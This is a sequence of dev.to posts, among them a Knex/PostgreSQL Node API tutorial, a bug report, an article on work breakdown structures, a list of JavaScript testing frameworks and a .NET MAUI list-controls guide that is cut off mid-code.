tools, and addressing challenges proactively, organizations can achieve efficient and effective API testing. As APIs continue to evolve and become more integral to software ecosystems, the importance of robust API test automation will only grow, making it an indispensable part of the development lifecycle.
keploy
1,909,063
How to Create a Node API With Knex and PostgreSQL
Creating a strong and well-structured backend is very important to aiding database management systems...
0
2024-07-02T15:15:37
https://dev.to/mmili_01/how-to-create-a-node-api-with-knex-and-postgresql-4329
Creating a strong and well-structured backend is very important to aiding database management systems in programming. As a developer, you may need help writing raw SQL queries and manually handling database migrations and transactions. Knex.js helps you easily create complex queries to select, insert, update and delete data from a database. In this article, you will learn how to set up a development environment for using PostgreSQL, configure Knex with PostgreSQL, and build a RESTful API using Node.js, Knex, and PostgreSQL. You will design a to-do list by the end of this article to implement what you are learning. ## Overview of Knex [Knex.js](https://knexjs.org/) is a versatile SQL query builder primarily used with Node.js. It is designed for flexibility, portability, and ease of use across various databases, such as PostgreSQL, CockroachDB, MSSQL, MySQL, MariaDB, SQLite3, Better-SQLite3, Oracle, and Amazon Redshift. [PostgreSQL](https://www.postgresql.org/) is a popular relational database system widely used in modern web applications and other software systems. ## Setting up your Development Environment Installing PostgreSQL is necessary if you want to use it for development. Navigate to the [PostgreSQL website](https://www.postgresql.org/download/) and select your operating system to download PostgreSQL. Alternatively, you can use PostgreSQL on the cloud with the help of platforms like [Neon.tech](http://Neon.tech) and [ElephantSQL](https://www.elephantsql.com/). Both of them offer PostgreSQL as a service. After setting up PostgreSQL on your machine, proceed to create a folder for our todo by running the following commands: ```bash mkdir knex-todo-tutorial ``` Next, navigate into the project directory using `cd` by running the following commands: ```bash cd knex-todo-tutorial ``` While in the project directory, run the following commands to initialise npm in your project directory: ```bash npm init -y ``` The `-y` flag initialises `npm` with all the default parameters. To use Knex with PostgreSQL, you need to install some dependencies. Run the following commands to install them in your project: ```bash npm install -g knex npm install pg express dotenv ``` Note that installing Knex globally is important; otherwise, it might not initialise. Next, create a `.env` file in your project’s root directory and store your database credentials. ```bash # URI DATABASE_URI = YOUR_DATABASE_URI # credentials DATABASE_NAME = YOUR_DATABASE_NAME DATABASE_PASSWORD = YOUR_DATABASE_PASSWORD ``` Replace the various placeholders in the code snippet above with the actual values. ## Setting up your Express Server In this tutorial, we will use a simple to-do list API to demonstrate the use of Knex in combination with PostgreSQL with Node.js to build a Node.js application. First, create an `index.js` file in your project’s root directory and add the code block to it: ```jsx const express = require("express"); const app = express(); const port = 3000; app.use(express.json()); app.listen(port, () => { console.log(`App listening on port:${port}`); }); ``` The code block above initialises your express server and listens on `port` 3000. It uses `express.json()` middleware to parse incoming JSON requests. ## Configuring Knex with PostgreSQL To use Knex in your application, you will have to initialise it first and configure it with the database driver you wish to use. In this case, we are using PostgreSQL. Run the following commands to initialise Knex in your application: ```bash knex init ``` The command above creates a `knexfile.js`, which contains configuration settings to connect to your database, such as a database type, host, port, username, password, and other configuration options. You then have to configure it based on your development environment. The `knexfile.js` command generated will have `sqlite3` as its development database by default. To use PostgreSQL, replace your current `knexfile.js` with the code block below: ```jsx // Update with your config settings. require("dotenv").config(); /** * @type { Object.<string, import("knex").Knex.Config> } */ module.exports = { development: { client: "pg", connection: process.env.DATABASE_URI, migrations: { directory: "./db/migrations", } } }; ``` The code block above configures Knex to use Postgres as its database client. It also specifies the database connection with environmental variables and the file path where your migration files will be stored. Next, create a `db` folder in your project directory by running the command below: ```bash mkdir db ``` Create a `db.js` file in your `db` folder and import `knex` and your `knexFile.js` file in this manner: ```jsx const knex = require("knex"); const knexFile = require("../knexfile.js"); ``` Next, set up your `environment` variable using the code block below: ```jsx //db/db.js const environment = process.env.NODE_ENV || "development"; module.exports = knex(knexFile[environment]); ``` The code block above sets your `environment` variable to either the `NODE_ENV` or `development` This lets you specify different configurations for different environments, such as development, production, or testing. The `module.exports` statement exports a configured Knex.js instance using the configuration settings from `knexFile[environment]`. This instance can create database tables, insert data, run queries, and perform other database-related operations in JavaScript code. ## Creating Migration Files Migration files are scripts or programs you can use to manage the changes made in a database schema, such as adding new tables, modifying existing ones, or adjusting column types, without losing data or disrupting ongoing operations. They are used to automate the transfer of data from one database to another. Altering the schema of a database can be complex and make the database prone to errors. By using migration files, you can define the changes you want to make in a migration file instead of manually modifying the database schema. When you run the migration file using Knex, it automatically applies the changes to the database schema, ensuring that the changes are made consistently and correctly. To create a migration file, run the command below: ```jsx knex migrate:make todo ``` Create a "todo" migration file in the path specified by the knexfile.js file (db/migrations) using the command above. Note that you can replace the “todo” argument with your preferred migration name. Next, open your migration file and replace the `up` function with the code block below: ```jsx exports.up = function (knex) { //Create a table called "todo" with the following columns: id, title, content, created_at, updated_at return knex.schema.createTable("todo", (table) => { table.increments("id").primary(); //id column with auto-incrementing primary key table.string("title").notNullable(); //title column with type string table.text("content").notNullable(); //content column with type text table.timestamps(true, true); //created_at and updated_at columns with type timestamp }); }; ``` The code block above, when executed, creates a todo table in your PostgreSQL database with the tables specified above. Next, replace the `down` function with the code block below: ```jsx exports.down = function (knex) { // Drop the "todo" table if it exists return knex.schema.dropTableIfExists("todo"); }; ``` The todo table in your PostgreSQL database is dropped when the code block above is executed. This is the opposite of what the `up` function does. Run the code block below on your terminal to run migrations. ```jsx knex migrate:latest ``` The command above goes through all your migration files and runs the `up` function. To undo the migrations, run the command below: ```jsx knex migrate:rollback ``` The command above goes through all your migration files and runs the `down` function. ## Creating CRUD Endpoints Create a `routes` folder in the root directory of your project and a `todo.js` file for better code organisation. In your `todo.js` file, import Express, your Knex configuration, and set up the Express Router. Here’s how to do it: ```jsx const express = require("express"); const db = require("../db/db.js"); const router = express.Router(); ``` In your `todo.js` file, you can add CRUD endpoints to interact with your database. The tutorial will feature queries that get all the tasks, get a task(s) based on a condition, update a task, and delete a task from the database. ### Getting All Tasks To get all the task instances on your to-do list from your database, use the code block below in your `blog.js` file. ```jsx router.get("/todo", async (req, res) => { try { const tasks = await db.select("*").from(todo); res.send({ msg: tasks }); } catch (error) { res.status(500).json({ error: error.message }); } }); ``` The code block above returns all the tasks in your database. ### Getting Tasks Conditionally To get the tasks on your database based on certain conditions, use the code block below to achieve that: ```jsx router.get("/todo/:id", async (req, res) => { const { id } = req.params; try { const task = await db(todo).where({ id }); if (task.length !== 0) { res.send({ msg: task }); } else { res.status(400).json({ msg: "task not found" }); } } catch (error) { res.status(500).json({ error: error.message }); } }); ``` The code block above returns the task based on the “id” given. ### Adding a new Task to your Database To add a new task to your database, use the code block below to achieve that: ```jsx router.post("/todo", async (req, res) => { const { title, content } = req.body; try { const task = await db("todo").insert({ title, content }); res.status(201).send(task); } catch (error) { res.status(500).json({ error: error.message }); } }); ``` The code block above adds a new task to your database. ### Updating an Existing Task To update an existing task on the database, use the code block below: ```jsx router.put("/todo/:id", async (req, res) => { const { id } = req.params; const { title, content} = req.body; try { const task = await db("todo") .where({ id }) .update({ title, content }, ["id", "title", "content"]); if (task.length !== 0) { res.status(201).send(task); } else { res.status(404).json({ error: "task not found" }); } } catch (error) { res.status(500).json({ error: error.message }); } }); ``` The code block above updates an existing task based on a given id. ### Deleting a Task To delete a task from the database, use the code block below: ```jsx router.delete("/todo/:id", async (req, res) => { const { id } = req.params; try { const task = await db("todo").where({ id }).del(); if (task) { res.status(204).send(); } else { res.status(404).json({ error: "Task not found" }); } } catch (error) { res.status(500).json({ error: error.message }); } }); ``` The code block above deletes a task from your database. Finally, export your router by adding the line of code below to your `todo.js` ```jsx module.exports = router ``` ## Testing Your Application Navigate to your `index.js`, import your `router` and add it as a middleware in this manner: ```jsx //index.js const todoRouter = require("./routes/todo.js"); app.use(todoRouter); ``` Then, start up your application by running the command below: ```jsx node index.js ``` To test your application, you can use tools such as [Postman](https://www.postman.com/) to make HTTP requests to your API and verify that it returns the expected results. ## **Conclusion** In this article, you learned how to use Knex.js with PostgreSQL to build a Node.js API. You also learned how to configure Knex to use PostgreSQL as its database client, connect to a PostgreSQL database locally and remotely, and make queries using Knex. With the knowledge gained in this article, you can now build strong and reliable Node.js applications that leverage the power of PostgreSQL and the simplicity of Knex.js.
mmili_01
1,909,061
Discover the Fascinating World of Computation and Logic with Inf1 from the University of Edinburgh 🧠
Explore the fundamentals of computation and logic with this comprehensive course from the University of Edinburgh. Access weekly schedules, previous materials, and a birds-eye overview of the subject matter.
27,844
2024-07-02T15:14:39
https://getvm.io/tutorials/inf1-computation-and-logic-2015-university-of-edinburgh
getvm, programming, freetutorial, universitycourses
Are you curious about the fundamental principles of computation and logic? Look no further than the Inf1 - Computation and Logic course offered by the prestigious University of Edinburgh! 🏫 ## Course Overview This comprehensive course will take you on a captivating journey through the core concepts of computation and logic. Developed by a team of renowned experts, the course provides a birds-eye view of the subject matter, covering weekly schedules, previous materials, and a wealth of engaging content. ## What You'll Learn 🤓 Throughout the course, you'll explore the fascinating interplay between computation and logic, delving into topics such as: - Fundamental principles of computation - The intricacies of logical reasoning - The role of algorithms in problem-solving - The relationship between data, information, and knowledge ## Why You Should Enroll 💡 Whether you're a student looking to expand your knowledge or a lifelong learner with a passion for technology, this course is a must-try. With its user-friendly format and convenient access to course materials, you can easily fit it into your schedule and embark on an enriching educational journey. ## Get Started Today! 🚀 Don't miss out on this incredible opportunity to unlock the secrets of computation and logic. Visit the course website at [http://www.inf.ed.ac.uk/teaching/courses/inf1/cl/](http://www.inf.ed.ac.uk/teaching/courses/inf1/cl/) and get ready to dive into a world of intellectual stimulation and personal growth. Let's embark on this exciting adventure together! 🎉 ## Enhance Your Learning with GetVM's Playground 🚀 To truly unlock the full potential of the Inf1 - Computation and Logic course from the University of Edinburgh, I highly recommend using the GetVM Playground. This powerful browser extension provides an immersive online coding environment, allowing you to seamlessly apply the concepts you learn and experiment with hands-on exercises. With the GetVM Playground, you can access the course materials directly from the [https://getvm.io/tutorials/inf1-computation-and-logic-2015-university-of-edinburgh](https://getvm.io/tutorials/inf1-computation-and-logic-2015-university-of-edinburgh) link, and dive into interactive coding challenges. This interactive approach not only reinforces your understanding but also helps you develop practical skills that you can apply in real-world scenarios. The Playground's intuitive interface and instant feedback make it an invaluable tool for learning. You can experiment with different algorithms, test your logical reasoning, and receive immediate guidance to ensure you're on the right track. This seamless integration of theory and practice will accelerate your learning and equip you with the necessary skills to excel in the field of computation and logic. So, why wait? Start your journey with the Inf1 - Computation and Logic course and enhance your learning experience with the powerful GetVM Playground. Unlock your full potential and become a master of computation and logic! 🧠💻 --- ## Practice Now! - 🔗 Visit [Inf1 - Computation and Logic | University of Edinburgh](http://www.inf.ed.ac.uk/teaching/courses/inf1/cl/) original website - 🚀 Practice [Inf1 - Computation and Logic | University of Edinburgh](https://getvm.io/tutorials/inf1-computation-and-logic-2015-university-of-edinburgh) on GetVM - 📖 Explore More [Free Resources on GetVM](https://getvm.io/explore) Join our [Discord](https://discord.gg/XxKAAFWVNu) or tweet us [@GetVM](https://x.com/getvmio) ! 😄
getvm
1,909,060
Bug Report for SAW
Date: 01/07/2024 Summary: The application has multiple issues affecting its usability, particularly...
0
2024-07-02T15:11:35
https://dev.to/abdielbytes/bug-report-for-saw-3hf9
Date: 01/07/2024 **Summary:** The application has multiple issues affecting its usability, particularly with the URL management functionalities. Various buttons and features do not perform as expected, and some operations cause the application to crash or behave unpredictably. **Detailed Description of Issues:** UI Issue: "Add URL" Button Covers Text on Startup - Severity: Medium - Description: Upon opening the application, the "Add URL" button overlaps with text on the screen, obstructing readability. - Steps to Reproduce: - Open the application. - Observe the "Add URL" button's position relative to on-screen text. "Add URL" Button Non-Functional - Severity: High - Description: The "Add URL" button does not function when clicked. - Steps to Reproduce: - Click the "Add URL" button. - No action is taken by the application. "URL Must Contain" Text on Sidebar Not Functional - Severity: Medium - Description: The feature indicating that the URL must contain specific text on the sidebar does not work as intended. - Steps to Reproduce: - Add a URL. - Check if the URL is validated against the specified text. Inconsistent Performance: "Add URLs from File" - Severity: High - Description: Adding URLs from a file does not work reliably; sometimes, the app needs to be restarted to function correctly. - Steps to Reproduce: - Attempt to add URLs from a file. - Observe if the operation succeeds without requiring a restart. False Link Detection in DOCX Files - Severity: Medium - Description: The application detects links in DOCX files that do not contain any links. It is unclear if this is intentional. - Steps to Reproduce: - Add a DOCX file with no links. - Check if the app identifies any links. Loss of Scrapped Links on Restart - Severity: High - Description: When the app is restarted, it only retains scraped links, and un-scrapped links are lost. - Steps to Reproduce: - Scrap links in the app. - Restart the app. - Observe that only scraped links are present. App Crash When Adding DOCX File with URLs - Severity: Critical - Description: The application closes unexpectedly when a DOCX file containing URLs is added. - Steps to Reproduce: - Add a DOCX file containing URLs. - Observe if the app crashes. Incorrect URL Display After Restart - Severity: High - Description: After restarting the app, it displays random URLs associated with a file instead of the correct URLs. - Steps to Reproduce: - Add a file with URLs. - Restart the app. - Check the URLs displayed. Scraping Functionality Without Internet - Severity: Medium - Description: The application continues to scrape URLs even when there is no internet connection, which is unexpected behavior. - Steps to Reproduce: - Disconnect from the internet. - Attempt to scrape URLs. - Observe if the app continues to scrape. Environment: App Version: Operating System: Windows 10 Additional Comments: It is crucial to address these issues to improve the application's reliability and user experience. Please feel free to contact me for any further information or clarification.
abdielbytes
1,908,071
Work Breakdown Structure (WBS)
As a part of my course on Software Project Management, I learned about this new thing: Work Breakdown...
0
2024-07-02T15:09:56
https://dev.to/abedin022/work-breakdown-structure-wbs-1n1g
programming, projectmanagement, softwareengineering, workbreakdownstructure
As a part of my course on Software Project Management, I learned about this new thing: Work Breakdown Structure (WBS). After doing an ample amount of research on this topic, I decided to write an article about it explaining WBS in the simplest terms. ### What is WBS? Every complex thing has to be broken down into smaller parts to be efficiently accomplished, software projects are no different in this regard. When you have a complex project and want to ensure the project is managed and completed properly, maintaining the highest possible standards; you break it down into smaller tasks. The broken-down structure is precisely known as WBS. ![A Sample WBS](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/h8f7d97np0vnhmu5gqqn.jpg) ### Types of WBS Primarily there are two types of WBS: 1. Deliverable-Based WBS 2. Phase-Based WBS #### Deliverable-Based WBS In this WBS, the work is first broken down into small deliverable units which are meant to be completed one after another. Each of the deliverable units is then broken down into sub-units for better understanding and easier accomplishment. ![A Deliverable-Based WBS](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/higtb28qtvhc2h104aiu.jpg) #### Phase-Based WBS In this category of WBS, instead of deliverables, the work is broken down into phases; each phase consists of a whole range of activities to be completed. A phase stars generally after the previous phase ends. ![A Phase-Based WBS](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3m0do70yclshhuywvs49.jpg) ### Key points about a WBS Here are some key points that should be taken care of to design a proper and clearly understandable WBS. #### Control Account A control account is a checkpoint that helps us monitor and manage the project's budget and resources effectively. It also helps us measure the performance of the project. Benefits of WBS include early detection of problems, providing a clear picture of resource consumption, and many more. #### Planning Package A planning package represents a higher level of task that needs to be broken down into smaller units to be accomplished. These are often used to estimate and allocate resources for specific segments of the project. In other words, planning packages often serve as control accounts. #### Work Package A work package is the smallest unit or leaf-level unit of a WBS because the work generally cannot be broken down further. It's a collection of related tasks to achieve a specific outcome in a project. For a better understanding, have a look at this diagram. ![Control Account, Planning Package & Work Package](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ksioytqmlxcxn8yg2jht.png) #### Gantt Chart A Gantt chart is a specific type of chart in project management that is used to describe the project schedule. It basically describes the sequence in which the project tasks have to be completed. Each Gantt chart has two parts: a list of tasks on the left and a timeline on the right. ![Gantt Chart](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fo1sruvswfmt5n8vcrw1.jpg) These are mostly the basic concepts related to WBS. A deeper study of project management will enable us to know about more concepts but these primary tasks lay the foundation of seemingly complete WBS and deliver the project plan and timeline properly to the stakeholders. Feel free to share your thoughts and also do more research on WBS and project management to get a deeper understanding.
abedin022
1,909,059
Boost Your Testing Game
JavaScript Testing Frameworks Jest Summary: A comprehensive testing framework...
0
2024-07-02T15:08:26
https://dev.to/gadekar_sachin/boost-your-testing-game-344c
### JavaScript Testing Frameworks 1. **Jest** - **Summary**: A comprehensive testing framework developed by Facebook. It's widely used for testing JavaScript applications, particularly those built with React. - **Features**: Built-in test runners, coverage reports, snapshot testing, and mock functions. 2. **Mocha** - **Summary**: A flexible testing framework for Node.js, known for its simplicity and extensive configuration options. - **Features**: Asynchronous testing, customizable reporting, and integration with various assertion libraries like Chai. 3. **Cypress** - **Summary**: An end-to-end testing framework for web applications, designed to be fast, reliable, and easy to use. - **Features**: Real-time reloads, time-travel debugging, and a powerful dashboard for test results. 4. **Jasmine** - **Summary**: A behavior-driven development (BDD) framework for testing JavaScript code. - **Features**: Easy syntax, no need for external libraries, built-in assertions, and support for asynchronous testing. 5. **Karma** - **Summary**: A test runner developed by the AngularJS team, primarily for unit testing in JavaScript. - **Features**: Supports multiple browsers, real-time testing, and integration with various continuous integration (CI) tools. 6. **QUnit** - **Summary**: A powerful, easy-to-use JavaScript unit testing framework, particularly useful for testing jQuery projects. - **Features**: Built-in assertions, test organization, and support for asynchronous testing. 7. **Ava** - **Summary**: A minimalistic test runner for JavaScript, known for its simplicity and parallel test execution. - **Features**: Parallel test execution, concise API, and support for ES6/ES7 features. 8. **Enzyme** - **Summary**: A JavaScript testing utility for React, developed by Airbnb, allowing for easier manipulation and traversal of React components. - **Features**: Shallow rendering, full DOM rendering, and static rendering. These frameworks cater to different needs, from unit testing and integration testing to end-to-end testing, and they offer a range of features to support efficient and effective test automation in JavaScript projects.
gadekar_sachin
1,906,108
All the Lists in .NET MAUI
This blog is part of the .NET MAUI UI July 2024 series with a new post every day of the month. See...
0
2024-07-02T15:04:00
https://dev.to/davidortinau/all-the-lists-in-net-maui-33bd
dotnet, dotnetmaui, mobile, mauiuijuly
> This blog is part of the [.NET MAUI UI July 2024](https://goforgoldman.com/posts/mauiuijuly-24/) series with a new post every day of the month. See the [full schedule](https://goforgoldman.com/posts/mauiuijuly-24/#net-maui-ui-july-schedule) for more. In any app project, you will inevitably have a list of things to display and be faced with choosing the best control to use. Here I will muse on how I have approached these decisions, focusing on mobile applications. I surveyed the apps on my phone and snagged a cross-section of different experiences. For the data, I wrote a `MockDataService` to generate useful yet random content. For images, I used a combination of [Lorem Picsum](https://picsum.photos) and images I crafted with [ChatGPT](https://chatgpt.com/). I think the results are pretty nice, although I warn they are not production polished and feature complete. ![feature image of various layouts](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ldmf1q2wg5gwasqlieua.png) Jump to each of the samples below: * [Basic list](#layout-1-basic-list) - even rows * [Reviews](#layout-2-reviews-uneven-rows) - uneven rows * [Social check-in](#layout-3-social-check-in-uneven-rows-complex-layout) - complex layout * [Learning course](#layout-4-learning-course-expand-and-contract) - expanding rows * [Who's Watching](#layout-5-whos-watching-flex-layout) - flex layout * [Mailboxes](#layout-6-mailboxes-expand-and-contract) - expanding rows * [Contacts](#layout-7-contacts-grouping-search) - grouping and search * [Shopping](#layout-8-shopping-header-data-template-selector-infinite-scroll) - header, multiple data templates, infinite scroll {% embed https://github.com/davidortinau/AllTheLists %} Before I get into each sample, I want to get out of the way some general thoughts. **Anything that does everything does nothing well.** In order for a generalized control to be flexible enough to meet a wide variety of needs, compromises will be made in its implementation. This may lead you to be frustrated when it doesn't meet your expectations. A specialized control that only does what you need will best meet the need of that scenario. The other side of that sharp edge is your knowledge and skill also need to level up from general to specialized. **Flat is faster than fat.** It's true. If speed is important to your scenario, then a layout that avoids a lot of UI and nesting of controls will perform better at scale because it requires fewer measure and layout calls. Avoid measuring at all costs when performance is critical; give your UI explicit size anytime you can. **UX > UI** I see a lot of apps struggling with list scenarios because they jam a ton of UI into them to get the job done, rather than leaning on good UX principles. Do you really need a whole chat experience in every row of the list, or could you navigate to another page? Perhaps you could use a modal experience or a bottom sheet? Anytime your mobile UI has more than one clear call to action, then you're in danger of the UI being less efficient instead of more efficient for your user. Solve problems with UX before UI. ## Overview of .NET MAUI List Controls In my sample, I've used three built-in controls and two community controls that all demonstrate different approaches with strengths and weaknesses. .NET MAUI provides `CollectionView`, `ListView`, and `BindableLayout`. From the community, I chose [`VirtualListView`](https://www.nuget.org/packages/Redth.Maui.VirtualListView) and [`VirtualizeListView`](https://www.nuget.org/packages/MPowerKit.VirtualizeListView). There are many other options, a few of which I list at the end for you to evaluate yourself. | | CollectionView | ListView | BindableLayout | VirtualListView | VirtualizeListView | |---------------|----------------|----------|----------------|---------------|-------------------| | **Virtualized** | Yes | Yes | No | Yes | Yes | | **Pull-to-Refresh** | Yes - with RefreshView | Yes | Yes - with RefreshView | Yes | Yes | | **Single Selection** | Yes | Yes | No | Yes | Yes | | **Multiple Selection** | Yes | No | No | Yes | No | | **Load More (Threshold)** | Yes | No | No | No | Yes | | **Layout - Vertical** | Yes | Yes | Yes | Yes | Yes | | **Layout - Horizontal** | Yes | No | Yes | | Yes | | **Layout - Grid** | Yes | No | Yes | No | No | | **Layout - Custom** | Yes | No | Yes | No | No | | **Behavior** | Platform specific | Platform specific | Cross-platform | Platform specific | Cross-platform | | **Grouped Data** | Yes | Yes | No | Yes | Yes | | **Context Menu Items** | Yes - with SwipeView | Yes | Yes - with SwipeView | No | No | | **Header / Footer** | Yes | Yes | No | Yes | Yes | | **Predefined Templates** | No | Yes | No | No | No | | **Empty View Template** | Yes | No | Yes - with Community Toolkit | Yes | No | I will mostly focus on `CollectionView` over `ListView` unless there is a compelling reason to prefer the latter. ### Additional Performance Notes If the speed of rendering and scroll is of utmost importance for your scenario, then these notes are for you. * **Layout Lifecycle** - understanding the [layout measure and arrange process](https://learn.microsoft.com/dotnet/maui/user-interface/layouts/custom?view=net-maui-8.0#layout-process) is essential when you're trying to diagnose and improve the rendering performance of a complex UI. In general, if you know the size of something, then provide it. * **Compiled Bindings** will improve the rendering and updating of your XAML data-bound controls by telling the compiler the type that is being used. On any enclosing XAML element with a BindingContext specify the type with, for example, `x:DataType="model:Sample"`. * **Binding Modes** - the default binding mode for bindable properties differs from control to control, and property to property. Most are `OneWay` such as `View.Rotation` or `View.Scale`, while properties often used to capture user input are `TwoWay` such as `Entry.Text` and `ListView.IsRefreshing`. In most cases, the default will be what you expect and need, but keep in mind you can change these and have other options such as `OneTime` and `OneWayToSource`. [Documentation](https://learn.microsoft.com/dotnet/maui/fundamentals/data-binding/binding-mode?view=net-maui-8.0) * **ObservableCollection vs List** if your data won't be updating dynamically, and perhaps it's a `OneTime` binding, then use `List`. * **Images** - make sure your images are appropriately sized for their use on screen. Scaling down images at runtime can be a massive demand on resources, quickly sending you into memory and crash issues. Raster images render faster than vector images in almost every situation. AND if you're loading images from a remote source, be sure you're not blocking the UI loading them. Use a control like FFImage to show a placeholder image and lazy load the remote image. Also, be aware you can customize the [image caching policy](https://learn.microsoft.com/dotnet/maui/user-interface/controls/image?view=net-maui-8.0#image-caching) in .NET MAUI. * **Release vs Debug** - when evaluating performance, you must be using a release build. There are just so many things going on in a debug build that slow the app down that it's not at all useful to judge. Produce a release build and measure that. And know your options for AOT (Ahead of Time) compilation. .NET 9 has a preview Native AOT for iOS; however, it's extremely strict, and most libraries are not compatible. We did a lot of work in .NET MAUI itself to make it compatible. Android has partial (startup tracing) and full AOT to choose from. * **Test on Device** - be sure to review release builds on the device. If you know the target device and OS version of your users, then ideally test on that. I've used my iPhone 15 Pro, and a Pixel 5. In 99.9999% of cases, iOS isn't going to be where you see performance concerns. * **Layout compression (obsolete)** was a run-time optimization in Xamarin.Forms what would remove wrapping layouts from the visual tree. If the layout had no background color or received no user input via gestures, then it could safely be eliminated from the actual UI rendered to the screen. This was useful in Xamarin.Forms where nearly all views (renderers) were wrapped in views. Later in Xamarin.Forms, a set of updated renderers was introduced aptly named "fast renderers" which removed those wrapping views. In .NET MAUI, this redundancy was eliminated, and **Layout Compression** was not implemented. The API remains, but should be deprecated, and you should treat it so. ## Layout 1: Basic List {% embed https://youtu.be/WiZ8RKor86w %} This is the most simple and common use of a list, so there's not much to say about it. All the rows are exactly the same height and layout. For this need, you cannot go wrong between the virtualized controls. They all perform this scenario very well, even when displaying 10,000 rows. ```xml <CollectionView ItemsSource="{Binding Products}"> <CollectionView.ItemTemplate> <DataTemplate> <v:ProductListItem /> </DataTemplate> </CollectionView.ItemTemplate> </CollectionView> ``` ```xml <ListView ItemsSource="{Binding Products}"> <ListView.ItemTemplate> <DataTemplate> <ViewCell> <v:ProductListItem /> </ViewCell> </DataTemplate> </ListView.ItemTemplate> </ListView> ``` You may be wondering why I'm not binding anything above to the `ProductListItem`. `BindingContext` automatically propagates in this (and most) cases to the children. Here the provided `BindingContext` is the single `Product`. ```xml <?xml version="1.0" encoding="utf-8" ?> <ContentView xmlns="http://schemas.microsoft.com/dotnet/2021/maui" xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml" xmlns:ffimageloading="clr-namespace:FFImageLoading.Maui;assembly=FFImageLoading.Maui" xmlns:m="clr-namespace:AllTheLists.Models" xmlns:vm="clr-namespace:AllTheLists.ViewModels" x:DataType="m:Product" x:Class="AllTheLists.Views.ProductListItem"> <Grid Padding="16" ColumnDefinitions="80,*,40" ColumnSpacing="16"> <ffimageloading:CachedImage Source="{Binding ImageUrl}" HeightRequest="80" WidthRequest="80" LoadingPlaceholder="https://via.placeholder.com/80" ErrorPlaceholder="error.png"> </ffimageloading:CachedImage> <VerticalStackLayout Grid.Column="1" Padding="10"> <Label Text="{Binding Name}" FontSize="16" /> <Label Text="{Binding Price, StringFormat='Price: {0:C}'}" FontSize="14" /> <Label Text="{Binding Description}" FontSize="12" LineBreakMode="TailTruncation" /> </VerticalStackLayout> <CheckBox Grid.Column="2" VerticalOptions="Center" /> </Grid> </ContentView> ``` In addition to samples for `ListView` and `CollectionView`, I checked out `VirtualListView` by Redth and `VirtualizeListView` by MPowerKit. The latter is a completely cross-platform virtualized control, which is an interesting approach. If consistency across platforms is your goal, then that might be a great option for you. References: * [CollectionView](https://learn.microsoft.com/dotnet/maui/user-interface/controls/collectionview/?view=net-maui-8.0) * [FFImageLoading.Maui](https://www.nuget.org/packages/FFImageLoading.Maui) * [ListView](https://learn.microsoft.com/dotnet/maui/user-interface/controls/listview?view=net-maui-8.0) * [VirtualListView](https://www.nuget.org/packages/Redth.Maui.VirtualListView) * [VirtualizeListView](https://www.nuget.org/packages/MPowerKit.VirtualizeListView) ## Layout 2: Reviews [Uneven rows] {% embed https://youtu.be/hE5P-KPii0k %} The list of EV charging station reviews in the [PlugShare](https://www.plugshare.com) mobile app modeled the next sample. While the template is not very complex, it does have a variable-length string that wraps in a `Label`. This _was_ problematic in early releases of .NET MAUI, where the text would be clipped or flow offscreen. By default, the `ItemSizingStrategy` is to measure only the first item and assume all the rest of the items are the same size. This is much more performant for obvious reasons. To accommodate the variable sizing, I need to use a strategy that measures all items or each item individually. In practice, this performs well and scrolls very smoothly. ```xml <CollectionView ItemsSource="{Binding Reviews}" ItemSizingStrategy="MeasureAllItems"> <CollectionView.ItemTemplate> <DataTemplate> <v:ReviewListItem /> </DataTemplate> </CollectionView.ItemTemplate> </CollectionView> ``` ```xml <Grid ColumnDefinitions="40,*" RowDefinitions="Auto,Auto" ColumnSpacing="8" Margin="16"> <Image Source="{Binding StatusImage}" Grid.Column="0" Grid.RowSpan="2" HeightRequest="20" WidthRequest="20" VerticalOptions="Start" HorizontalOptions="Center"/> <VerticalStackLayout Grid.Column="1" Spacing="8"> <Label Text="{Binding Author}" FontSize="18" FontAttributes="Bold" /> <Label Text="{Binding Comment}" MaxLines="5" Margin="0,0,0,8" /> <Label Text="{Binding Car}" TextColor="Gray"/> <Label Text="{Binding ChargerType}" TextColor="Gray"/> </VerticalStackLayout> <Label Text="{Binding CreatedAt, StringFormat='{0:MM/dd/yyyy}'}" Grid.Row="0" Grid.Column="1" FontSize="10" TextColor="Gray" HorizontalOptions="End" VerticalOptions="Start" /> <BoxView HeightRequest="1" BackgroundColor="LightGray" VerticalOptions="End" Grid.Column="1" TranslationY="16" /> </Grid> ``` References: * [CollectionView](https://learn.microsoft.com/dotnet/maui/user-interface/controls/collectionview/?view=net-maui-8.0) * [ItemSizingStrategy](https://learn.microsoft.com/dotnet/maui/user-interface/controls/collectionview/layout?view=net-maui-8.0#item-sizing) ## Layout 3: Social Check-in [Uneven rows, Complex Layout] {% embed https://youtu.be/UULzWNRskNc %} For this sample, I took inspiration from [Untapped](https://untappd.com), a social beer enthusiast app. The Activity feed shows the beer check-ins of your friends, including a rating and an optional photo. When the photo is present, the template is a bit taller, so I again need to handle uneven rows. In this scenario, `CollectionView` has a clear advantage over `ListView` because I'm able to specify spacing between the items by calling up the `LinearItemsLayout`. ```xml <CollectionView ItemSizingStrategy="MeasureAllItems" ItemsSource="{Binding CheckIns}"> <CollectionView.ItemsLayout> <LinearItemsLayout Orientation="Vertical" ItemSpacing="10" /> </CollectionView.ItemsLayout> <CollectionView.ItemTemplate> <DataTemplate> <v:CheckInListItem /> </DataTemplate> </CollectionView.ItemTemplate> </CollectionView> ``` To accommodate the different looks, I could have opted for a [DataTemplateSelector](https://learn.microsoft.com/dotnet/maui/fundamentals/datatemplate?view=net-maui-8.0#create-a-datatemplateselector), but I chose instead to add a `HasImage` read-only property to the model in order to show/hide the `Image` control as well as adjust the Y position of the content. ```csharp public class Product { ///... public bool HasImage => !string.IsNullOrWhiteSpace(ImageUrl); } ``` ```xml <Border Grid.Row="1" TranslationY="{Binding Product.HasImage, Converter={StaticResource BoolToIntConverter}}" ``` I had not previously used the `BoolToObjectConverter` from the [.NET MAUI Community Toolkit](https://learn.microsoft.com/dotnet/communitytoolkit/maui/converters/bool-to-object-converter). What a tasty discovery! ```xml <mct:BoolToObjectConverter x:Key="BoolToIntConverter" TrueObject="-60" FalseObject="0"/> ``` Also great for flip-flopping colors. ```xml <mct:BoolToObjectConverter x:Key="BoolToColorBrushConverter" TrueObject="#FFFFFF" 